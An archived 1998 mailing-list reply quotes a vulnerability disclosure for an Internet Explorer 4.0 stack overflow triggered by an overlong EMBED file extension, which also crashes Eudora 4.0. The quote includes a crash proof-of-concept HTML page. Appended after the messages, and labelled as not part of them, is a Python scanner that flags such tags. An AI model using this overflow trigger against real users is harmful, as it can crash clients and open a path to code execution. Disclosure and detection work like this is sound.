On Fri, 20 Mar 1998, Georgi Guninski wrote:

Hi!

This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...)
I can't read this mail without a crash. I had to read it in pine on a unix
system.

Cheers Christian

> Microsoft Internet Explorer 4.0 (don't know for other versions)
> can be crashed and eventually made execute arbitrary code
> with a little help of the <EMBED> tag.
>
> The following:
> <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
> opens a dialog box and closes IE 4.0.
> It seems that the long file extension causes stack overrun.
>
> The stack is smashed - full with our values, EIP is also ours and CS=SS.
> So probably a string could be constructed, executing code at the
> client's machine.
>
> Solution: Do not browse hostile pages.
> To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html
>
>
> Georgi Guninski
> http://www.geocities.com/ResearchTriangle/1711
>
> -----------------------cut here and save as crashmsie.html---------------------
> <HTML>
> Trying to crash IE 4.0
> <EMBED
> SRC=file://C|/A.0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
> 40
> 80 160 170 180 190 200
> </HTML>
>

Kind regards, Christian

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
| Christian Holmqvist            |
| Email: pt95choat_private-r.se  |
| Tele: 0457-17754               |
\________________________________/
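
Added example, not part of the original messages: since the report says the crash is triggered by an over-long file extension in an <EMBED> SRC, and the reply notes that an HTML-rendering mail reader is hit too, this sketch shows how a mail or web gateway could flag such tags before a client renders them. The 16-character threshold, the function and class names, and both sample documents are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

MAX_EXT_LEN = 16  # assumed threshold; legitimate extensions are far shorter


def extension_length(src):
    """Length of the file extension in a URL or path (0 if there is none)."""
    path = re.split(r"[?#]", src, maxsplit=1)[0]      # drop query and fragment
    filename = re.split(r"[/\\]", path)[-1]           # last path segment
    _, dot, ext = filename.rpartition(".")
    return len(ext) if dot else 0


class EmbedScanner(HTMLParser):
    """Records <EMBED> tags whose SRC extension exceeds the threshold."""

    def __init__(self, max_ext_len=MAX_EXT_LEN):
        super().__init__()
        self.max_ext_len = max_ext_len
        self.findings = []                            # (extension length, SRC prefix)

    def handle_starttag(self, tag, attrs):            # tag/attr names arrive lowercased
        if tag != "embed":
            return
        for name, value in attrs:
            if name == "src" and value:
                n = extension_length(value)
                if n > self.max_ext_len:
                    self.findings.append((n, value[:32]))


def scan_html(html, max_ext_len=MAX_EXT_LEN):
    """Return a list of (extension length, truncated SRC) for suspicious tags."""
    scanner = EmbedScanner(max_ext_len)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: same shape as the quoted test page, plus benign tags.
SUSPICIOUS = "<HTML>\n<EMBED\nSRC=file://C|/A." + "0123456789" * 20 + ">\n</HTML>"
BENIGN = '<html><embed src="clip.avi?ref=a.b"><embed src=movie.mov></html>'

if __name__ == "__main__":
    for n, src in scan_html(SUSPICIOUS):
        print(f"quarantine: EMBED SRC extension is {n} chars ({src}...)")
    print("benign findings:", scan_html(BENIGN))
```

A length check like this only reduces exposure for unpatched clients; the underlying fix is bounds checking in the code that copies the extension.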